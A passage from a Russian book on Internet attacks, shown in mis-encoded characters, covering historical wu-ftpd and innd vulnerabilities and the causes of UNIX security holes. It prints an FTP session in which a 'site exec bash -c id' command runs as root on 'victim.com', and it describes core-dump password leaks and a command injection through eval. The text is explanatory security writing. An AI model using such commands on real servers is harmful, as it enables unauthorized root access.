Π§ΠΈΡ‚Π°ΠΉΡ‚Π΅ ΠΊΠ½ΠΈΠ³ΠΈ ΠΎΠ½Π»Π°ΠΉΠ½ Π½Π° Bookidrom.ru! БСсплатныС ΠΊΠ½ΠΈΠ³ΠΈ Π² ΠΎΠ΄Π½ΠΎΠΌ ΠΊΠ»ΠΈΠΊΠ΅

Π§ΠΈΡ‚Π°Ρ‚ΡŒ ΠΎΠ½Π»Π°ΠΉΠ½ «Атака Π½Π° InternetΒ». Π‘Ρ‚Ρ€Π°Π½ΠΈΡ†Π° 51

Автор Илья МСдвСдовский

evil# ftp victim.com

220 victim FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.

Name (victim:root): good

331 Password required for good.

Password: *****

230 User good logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> quote Β«site exec bash -c idΒ»

200-bash -c id

200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)

200 (end of β€˜bash -c idβ€˜)

Π’ΠΈΠ΄Π½ΠΎ, Ρ‡Ρ‚ΠΎ Π² послСднСй строчкС Π½Π° ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌ хостС Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΠ»Π°ΡΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Π° id ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ ΡΡƒΠΏΠ΅Ρ€ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, это ΠΎΠ·Π½Π°Ρ‡Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ хост уязвим.

Другая ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ вСрсии wu-ftpd (1996–1997 Π³Π³.), состояла Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹Ρ… условиях ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠ΅Ρ€Π΅ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ список Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ² ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹, Π° это ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Ρ‚ ΠΊ сбросу Π΄Π΅ΠΌΠΎΠ½ΠΎΠΌ Π°Π²Π°Ρ€ΠΈΠΉΠ½ΠΎΠ³ΠΎ Π΄Π°ΠΌΠΏΠ° памяти. Для этого Π½ΡƒΠΆΠ½Ρ‹ ΠΌΠΈΠ½ΠΈΠΌΠ°Π»ΡŒΠ½Ρ‹Π΅ полномочия Π°Π½ΠΎΠ½ΠΈΠΌΠ½ΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ ftp. Π‘Π°ΠΌΠΎΠ΅ интСрСсноС, Π²Π»Π°Π΄Π΅Π»ΡŒΡ†Π΅ΠΌ Π΄Π°ΠΌΠΏΠ° Π±ΡƒΠ΄Π΅Ρ‚ Π½Π΅ root, ΠΊΠ°ΠΊ ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ Π±Ρ‹Π²Π°Π΅Ρ‚, Π° anonymous, ΠΈ Π΄Π°ΠΌΠΏ Π±ΡƒΠ΄Π΅Ρ‚ ΡΠ±Ρ€Π°ΡΡ‹Π²Π°Ρ‚ΡŒΡΡ Π² Π΅Π³ΠΎ домашний ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³. ΠžΡ‚ΡΡŽΠ΄Π° слСдуСт, Ρ‡Ρ‚ΠΎ ΠΎΠ½ ΠΏΠΎΠ·ΠΆΠ΅ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΡ€ΠΎΡ‡ΠΈΡ‚Π°Π½ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎ. Ну Π° Ρ‡Ρ‚Π΅Π½ΠΈΠ΅ Π°Π²Π°Ρ€ΠΈΠΉΠ½ΠΎΠ³ΠΎ Π΄Π°ΠΌΠΏΠ° Ρ€Π°Π²Π½ΠΎΡΠΈΠ»ΡŒΠ½ΠΎ копанию Π² ΠΊΠΎΡ€Π·ΠΈΠ½Π΅ для Π±ΡƒΠΌΠ°Π³ Π½Π° сСкрСтном ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π΅ – срСди мусора находятся ΠΎΡ‡Π΅Π½ΡŒ Π»ΡŽΠ±ΠΎΠΏΡ‹Ρ‚Π½Ρ‹Π΅ Π²Π΅Ρ‰ΠΈ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€ ΡΠ±Ρ€ΠΎΡˆΠ΅Π½Π½Ρ‹Π΅ ΠΊΡΡˆΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΏΠ°Ρ€ΠΎΠ»ΠΈ. Π’Π°ΠΊ Ρ‡Ρ‚ΠΎ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ останСтся Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π·Π°ΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ Π²Π·Π»ΠΎΠΌΡ‰ΠΈΠΊ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ ΠΏΠΎΠ½ΠΎΠ²Π΅Π΅.

Π’ послСдний ΠΌΠΎΠΌΠ΅Π½Ρ‚ wu-ftpd вновь Π½Π°ΠΏΠΎΠΌΠ½ΠΈΠ» ΠΎ сСбС. Оказалось, Ρ‡Ρ‚ΠΎ Ссли Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΈΠΌΠ΅Π΅Ρ‚ ΠΏΡ€Π°Π²ΠΎ Π½Π° запись Π² Π½Π΅ΠΊΠΈΠΉ ftp-ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ (Π²ΠΏΠΎΠ»Π½Π΅ достаточно наличия /incoming), Ρ‚ΠΎ Ρƒ wu-ftpd пСрСполняСтся Π±ΡƒΡ„Π΅Ρ€ ΠΏΡ€ΠΈ создании Π²Π»ΠΎΠΆΠ΅Π½Π½Ρ‹Ρ… ΠΊΠ°Ρ‚Π°Π»ΠΎΠ³ΠΎΠ² с Π΄Π»ΠΈΠ½Π½Ρ‹ΠΌΠΈ ΠΈΠΌΠ΅Π½Π°ΠΌΠΈ. РСализация этой уязвимости, опубликованная Π² Internet, Π²Ρ‹Π·Π²Π°Π»Π° эпидСмию вскрытых хостов вСсной 1999 Π³ΠΎΠ΄Π°, ΠΏΠΎΡ‚ΠΎΠΌΡƒ Ρ‡Ρ‚ΠΎ нашлись ΠΌΠΎΠ»ΠΎΠ΄Ρ‹Π΅ люди, ΡƒΠΌΠ΅ΡŽΡ‰ΠΈΠ΅ Π·Π°ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒ Ρ‡ΡƒΠΆΠΈΠ΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ ΠΈ ΡΡ‡ΠΈΡ‚Π°ΡŽΡ‰ΠΈΠ΅ сСбя ΠΏΡ€ΠΈ этом Β«ΠΊΡ€ΡƒΡ‚Ρ‹ΠΌΠΈ Ρ…Π°ΠΊΠ΅Ρ€Π°ΠΌΠΈΒ».

ΠŸΡ€ΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΠ΅ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ innd

ΠŸΡ€ΠΎΠΈΠ»Π»ΡŽΡΡ‚Ρ€ΠΈΡ€ΡƒΠ΅ΠΌ Ρ‚ΠΎΡ‚ ΠΏΡƒΡ‚ΡŒ, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌΡƒ ΠΈΠ΄ΡƒΡ‚ ΠΊΡ€Π°ΠΊΠ΅Ρ€Ρ‹ сСгодня ΠΈ рассмотрим самый популярный способ проникновСния Π² UNIX-хосты Π½Π° Π½Π°Ρ‡Π°Π»ΠΎ 1997 Π³ΠΎΠ΄Π°.

Π’ качСствС Β«Π»Π°Π·Π΅ΠΉΠΊΠΈΒ» Π±Ρ‹Π»Π° Π²Ρ‹Π±Ρ€Π°Π½Π° сСрвСрная ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°, ΠΎΡ‚Π²Π΅Ρ‡Π°ΡŽΡ‰Π°Ρ Π·Π° ΠΏΠ΅Ρ€Π΅Π΄Π°Ρ‡Ρƒ новостСй USENET ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ NNTP, называСмая InterNet News (Inn). Π’Π°ΠΊΠΎΠΉ Π²Ρ‹Π±ΠΎΡ€ для ΠΊΡ€Π°ΠΊΠ΅Ρ€ΠΎΠ² ΠΎΡ‡Π΅Π½ΡŒ ΡƒΠ΄Π°Ρ‡Π΅Π½: Π²ΠΎ-ΠΏΠ΅Ρ€Π²Ρ‹Ρ…, эта ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° Β«Π½Π΅ запятнала» сСбя Ρ€Π°Π½Π΅Π΅ (это ΠΊΠ°ΠΊ Ρ€Π°Π· ΠΏΡ€ΠΈΠΌΠ΅Ρ€ новаторского ΠΏΠΎΠ΄Ρ…ΠΎΠ΄Π°); Π²ΠΎ-Π²Ρ‚ΠΎΡ€Ρ‹Ρ…, ΠΊΠ°ΠΊ ΠΈ любой Π΄Π΅ΠΌΠΎΠ½, ΠΎΠ½Π° ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ допускаСт ΠΏΡ€ΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΠ΅ ΠΏΠΎ классу 1; Π²-Ρ‚Ρ€Π΅Ρ‚ΡŒΠΈΡ…, сСрвис ΠΏΠ΅Ρ€Π΅Π΄Π°Ρ‡ΠΈ новостСй Π²Ρ‹Ρ…ΠΎΠ΄ΠΈΡ‚ Π½Π° ΠΎΠ΄Π½ΠΎ ΠΈΠ· ΠΏΠ΅Ρ€Π²Ρ‹Ρ… мСст Π² Internet, поэтому ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° достаточно распространСна ΠΈ сущСствуСт практичСски Π½Π° всСх ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΠ°Ρ…; Π²-Ρ‡Π΅Ρ‚Π²Π΅Ρ€Ρ‚Ρ‹Ρ…, уязвимости, Ссли ΠΎΠ½ΠΈ найдутся Π² Π½Π΅ΠΉ, Π½Π΅ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ свСдСны Π½Π° Π½Π΅Ρ‚ мСТсСтСвым экраном. Поясним послСднСС ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Π΅Π΅. Если Π²Ρ‹ Ρƒ сСбя Π½Π° машинС ставитС сСрвСр, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π΄ΠΎΠ»ΠΆΠ΅Π½ ΠΎΡ‚Π²Π΅Ρ‡Π°Ρ‚ΡŒ Π·Π° ΠΏΡ€ΠΈΠ΅ΠΌ ΠΈ ΠΏΠ΅Ρ€Π΅Π΄Π°Ρ‡Ρƒ новостСй ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ NNTP, Ρ‚ΠΎ, СстСствСнно, обязаны Ρ€Π°Π·Ρ€Π΅ΡˆΠΈΡ‚ΡŒ этот ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ» Π² своСм мСТсСтСвом экранС. Но ΠΊΡ€Π°ΠΊΠ΅Ρ€, с Π΄Ρ€ΡƒΠ³ΠΎΠΉ стороны, Ρ‚Π°ΠΊΠΆΠ΅ Π±ΡƒΠ΄Π΅Ρ‚ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ Π½Π° ΡƒΡ€ΠΎΠ²Π½Π΅ NNTP. Π˜Π½Π°Ρ‡Π΅ говоря, ΠΊΠ°ΠΊ ΠΈ Π² ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Π½ΠΎΠΉ Π²Ρ‹ΡˆΠ΅ уязвимости Π² sendmail, мСТсСтСвой экран Π½Π΅ ΠΎΡ‚Π»ΠΈΡ‡Π°Π΅Ρ‚ ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ с Β«Ρ…ΠΎΡ€ΠΎΡˆΠΈΠΌΠΈΒ» новостями ΠΎΡ‚ Β«ΠΏΠ»ΠΎΡ…ΠΈΡ…Β», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ посылаСт ΠΊΡ€Π°ΠΊΠ΅Ρ€, β€“ Firewall ΠΌΠΎΠΆΠ΅Ρ‚ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π·Π°ΠΏΡ€Π΅Ρ‚ΠΈΡ‚ΡŒ ΠΈΠ»ΠΈ Ρ€Π°Π·Ρ€Π΅ΡˆΠΈΡ‚ΡŒ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹ΠΉ Ρ‚Ρ€Π°Ρ„ΠΈΠΊ Π² Ρ†Π΅Π»ΠΎΠΌ.

ИмСнно Ρ‚Π°ΠΊΠΎΠ³ΠΎ Ρ€ΠΎΠ΄Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π±Ρ‹Π»Π° Π½Π°ΠΉΠ΄Π΅Π½Π° Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ΅ innd [17]. Π‘Ρ€Π΅Π΄ΠΈ ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹Ρ… сообщСний USENET Π²ΡΡ‚Ρ€Π΅Ρ‡Π°ΡŽΡ‚ΡΡ Ρ‚Π°ΠΊ Π½Π°Π·Ρ‹Π²Π°Π΅ΠΌΡ‹Π΅ ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠ΅ Ρ‚ΠΈΠΏΠ° Β«newgroupΒ» ΠΈΠ»ΠΈ Β«rmgroupΒ». Innd ΠΎΠ±Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°Π΅Ρ‚ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹, располоТСнныС Π² Π½ΠΈΡ…, Ρ‡Π΅Ρ€Π΅Π· ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ Β«evalΒ». Однако нСкоторая информация (ΠΈΠ½Π°Ρ‡Π΅ говоря, ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Π°Π½Π½ΠΎΠ΅ Ρ„Π°Π»ΡŒΡˆΠΈΠ²ΠΎΠ΅ ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰Π΅Π΅ сообщСниС) ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠ΅Ρ€Π΅Π΄Π°Π½Π° ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ΅ Π±Π΅Π· Π½Π°Π΄Π»Π΅ΠΆΠ°Ρ‰Π΅Π³ΠΎ контроля. Π­Ρ‚ΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΠΈΡ‚ Π»ΡŽΠ±ΠΎΠΌΡƒ, ΠΊΡ‚ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΡ€ΠΈΡΡ‹Π»Π°Ρ‚ΡŒ сообщСния Π½Π° ваш NNTP-сСрвСр – ΠΈΠ½ΠΎΠ³Π΄Π° это Ρ‡ΡƒΡ‚ΡŒ Π»ΠΈ Π½ΠΈ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ USENET, ΠΈΡΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΊΠ°ΠΊΡƒΡŽ ΡƒΠ³ΠΎΠ΄Π½ΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ, имСя ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π΄Π΅ΠΌΠΎΠ½Π° innd, Π° это Π»ΠΈΠ±ΠΎ ΡΡƒΠΏΠ΅Ρ€ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ, Π»ΠΈΠ±ΠΎ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ news с ΡˆΠΈΡ€ΠΎΠΊΠΈΠΌΠΈ ΠΏΡ€Π°Π²Π°ΠΌΠΈ. ВсС вСрсии Inn, Π΄ΠΎ 1.5 Π²ΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ, оказались уязвимыми.

ΠŸΡ€ΠΈΡ‡ΠΈΠ½Ρ‹ сущСствования уязвимостСй Π² UNIX-систСмах

ΠŸΡ€ΠΎΠ°Π½Π°Π»ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π² большой фактичСский ΠΌΠ°Ρ‚Π΅Ρ€ΠΈΠ°Π», коснСмся ΠΏΡ€ΠΈΡ‡ΠΈΠ½, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ описанныС Π½Π°Ρ€ΡƒΡˆΠ΅Π½ΠΈΡ бСзопасности UNIX ΠΈΠΌΠ΅Π»ΠΈ мСсто, ΠΈ попытаСмся ΠΈΡ… ΠΊΠ»Π°ΡΡΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ (рис. 9.4). Π‘Ρ€Π°Π·Ρƒ оговоримся, Ρ‡Ρ‚ΠΎ классификация Π½ΠΈ Π² ΠΊΠΎΠ΅ΠΉ ΠΌΠ΅Ρ€Π΅ Π½Π΅ ΠΏΡ€Π΅Ρ‚Π΅Π½Π΄ΡƒΠ΅Ρ‚ Π½Π° Π½ΠΎΠ²ΠΈΠ·Π½Ρƒ ΠΈΠ»ΠΈ ΠΏΠΎΠ»Π½ΠΎΡ‚Ρƒ – ΠΊΠΎΠΌΡƒ интСрСсна эта Ρ‚Π΅ΠΌΠ°, ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π΅ΠΌ ΠΎΠ±Ρ€Π°Ρ‚ΠΈΡ‚ΡŒΡΡ ΠΊ Π±ΠΎΠ»Π΅Π΅ ΡΠ΅Ρ€ΡŒΠ΅Π·Π½Ρ‹ΠΌ Π½Π°ΡƒΡ‡Π½Ρ‹ΠΌ Ρ€Π°Π±ΠΎΡ‚Π°ΠΌ [11, 27]. Π—Π΄Π΅ΡΡŒ ΠΆΠ΅ ΠΌΡ‹ опишСм Π²ΠΏΠΎΠ»Π½Π΅ понятныС Ρ‡ΠΈΡ‚Π°Ρ‚Π΅Π»ΡŽ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Ρ‹, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ происходит Π΄ΠΎ 90 % всСх случаСв вскрытия UNIX-хостов:

Рис. 9.4. ΠŸΡ€ΠΈΡ‡ΠΈΠ½Ρ‹ уязвимости UNIX

1. ΠΠ°Π»ΠΈΡ‡ΠΈΠ΅ Π΄Π΅ΠΌΠΎΠ½ΠΎΠ².

2. ΠœΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌ SUID/SGID-процСссов.

3. Π˜Π·Π»ΠΈΡˆΠ½Π΅Π΅ Π΄ΠΎΠ²Π΅Ρ€ΠΈΠ΅.

4. Π§Π΅Π»ΠΎΠ²Π΅Ρ‡Π΅ΡΠΊΠΈΠΉ Ρ„Π°ΠΊΡ‚ΠΎΡ€ с вСсьма Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ способами Π΅Π³ΠΎ проявлСния – ΠΎΡ‚ Π»Π΅Π³ΠΊΠΎ вскрываСмых ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ Ρƒ ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹Ρ… ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ Π΄ΠΎ ошибок Ρƒ ΠΊΠ²Π°Π»ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… систСмных администраторов, ΠΌΠ½ΠΎΠ³ΠΈΠ΅ ΠΈΠ· ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΠΊΠ°ΠΊ Ρ€Π°Π· ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°ΡŽΡ‚ ΠΏΡƒΡ‚ΡŒ для использования ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΠΎΠ² довСрия.

ΠœΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΡ‹ 1 ΠΈ 2, ΡΠ²Π»ΡΡŽΡ‰ΠΈΠ΅ΡΡ Π½Π΅ΠΎΡ‚ΡŠΠ΅ΠΌΠ»Π΅ΠΌΠΎΠΉ Ρ‡Π°ΡΡ‚ΡŒΡŽ ΠΈΠ΄Π΅ΠΎΠ»ΠΎΠ³ΠΈΠΈ UNIX, Π±Ρ‹Π»ΠΈ ΠΈ Π±ΡƒΠ΄ΡƒΡ‚ Π»Π°ΠΊΠΎΠΌΡ‹ΠΌ кусочком для Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ², Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Π² этом случаС взаимодСйствуСт с процСссом, ΠΈΠΌΠ΅ΡŽΡ‰ΠΈΠΌ большиС ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ, ΠΈ поэтому любая ошибка ΠΈΠ»ΠΈ Π½Π΅Π΄ΠΎΡ€Π°Π±ΠΎΡ‚ΠΊΠ° Π² Π½Π΅ΠΌ автоматичСски Π²Π΅Π΄Π΅Ρ‚ ΠΊ использованию этих ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ.

О ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΠ΅ 3 ΡƒΠΆΠ΅ достаточно Π³ΠΎΠ²ΠΎΡ€ΠΈΠ»ΠΎΡΡŒ Π²Ρ‹ΡˆΠ΅. ΠŸΠΎΠ²Ρ‚ΠΎΡ€ΠΈΠΌ, Ρ‡Ρ‚ΠΎ Π² UNIX ΠΌΠ½ΠΎΠ³ΠΎ слуТб, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‰ΠΈΡ… Π΄ΠΎΠ²Π΅Ρ€ΠΈΠ΅, ΠΈ ΠΎΠ½ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ Ρ‚Π΅ΠΌ ΠΈΠ»ΠΈ ΠΈΠ½Ρ‹ΠΌ способом Π±Ρ‹Ρ‚ΡŒ ΠΎΠ±ΠΌΠ°Π½ΡƒΡ‚Ρ‹.

Π˜Ρ‚Π°ΠΊ, Π²ΠΎΡ‚ Ρ‚Π΅ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Ρ‹, ΠΏΠΎ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ Π΄Π΅ΠΌΠΎΠ½Ρ‹ ΠΈ SUID/SGID-процСссы становятся уязвимыми:

1. Π’ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ возникновСния нСпрСдусмотрСнных ситуаций, связанных с ошибками ΠΈΠ»ΠΈ Π½Π΅Π΄ΠΎΡ€Π°Π±ΠΎΡ‚ΠΊΠ°ΠΌΠΈ Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠΈ.

2. ΠΠ°Π»ΠΈΡ‡ΠΈΠ΅ скрытых ΠΏΡƒΡ‚Π΅ΠΉ взаимодСйствия с ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠΎΠΉ, Π½Π°Π·Ρ‹Π²Π°Π΅ΠΌΡ‹Ρ… «люками».

3. Π’ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ‹ ΡΡƒΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠ² ΠΈ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠ² Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ.

К ΠΏΠ΅Ρ€Π²ΠΎΠΉ ΠΌΠΎΠΆΠ½ΠΎ отнСсти ΠΊΠ»Π°ΡΡΠΈΡ‡Π΅ΡΠΊΡƒΡŽ ΡΠΈΡ‚ΡƒΠ°Ρ†ΠΈΡŽ с ΠΏΠ΅Ρ€Π΅ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ΠΌ Π±ΡƒΡ„Π΅Ρ€Π° ΠΈΠ»ΠΈ размСрности массива. Π—Π°ΠΌΠ΅Ρ‚ΠΈΠΌ сразу, Ρ‡Ρ‚ΠΎ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹Π΅ Π°Ρ‚Π°ΠΊΠΈ, нСсмотря Π½Π° ΡƒΠ½ΠΈΠ²Π΅Ρ€ΡΠ°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ способа, всСгда Π±ΡƒΠ΄ΡƒΡ‚ систСмозависимыми ΠΈ ΠΎΡ€ΠΈΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΌΠΈ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π½Π° ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½ΡƒΡŽ ΠΏΠ»Π°Ρ‚Ρ„ΠΎΡ€ΠΌΡƒ ΠΈ Π²Π΅Ρ€ΡΠΈΡŽ UNIX.

Π₯ΠΎΡ€ΠΎΡˆΠΈΠΌ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ΠΎΠΌ нСпрСдусмотрСнной ситуации Π² ΠΌΠ½ΠΎΠ³ΠΎΠ·Π°Π΄Π°Ρ‡Π½ΠΎΠΉ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмС являСтся Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½Π°Ρ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎΠ³ΠΎ сигнала ΠΈΠ»ΠΈ прСрывания. Часто Ρ…Π°ΠΊΠ΅Ρ€ ΠΈΠΌΠ΅Π΅Ρ‚ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΡΠΌΠΎΠ΄Π΅Π»ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΡΠΈΡ‚ΡƒΠ°Ρ†ΠΈΡŽ, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ этот сигнал ΠΈΠ»ΠΈ ΠΏΡ€Π΅Ρ€Ρ‹Π²Π°Π½ΠΈΠ΅ Π±ΡƒΠ΄Π΅Ρ‚ послано (Π² UNIX посылка сигнала Ρ€Π΅ΡˆΠ°Π΅Ρ‚ΡΡ ΠΎΡ‡Π΅Π½ΡŒ просто – ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ kill, ΠΊΠ°ΠΊ Π² ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π΅ с sendmail).

НаконСц, ΠΎΠ΄Π½Π° ΠΈΠ· самых распространСнных ошибок программистов – Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½Π°Ρ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° Π²Ρ…ΠΎΠ΄Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…, Ρ‡Ρ‚ΠΎ являСтся Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ ΠΎΠ±ΠΎΠ±Ρ‰Π΅Π½ΠΈΠ΅ΠΌ случая пСрСполнСния Π±ΡƒΡ„Π΅Ρ€Π°. А Ссли ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ 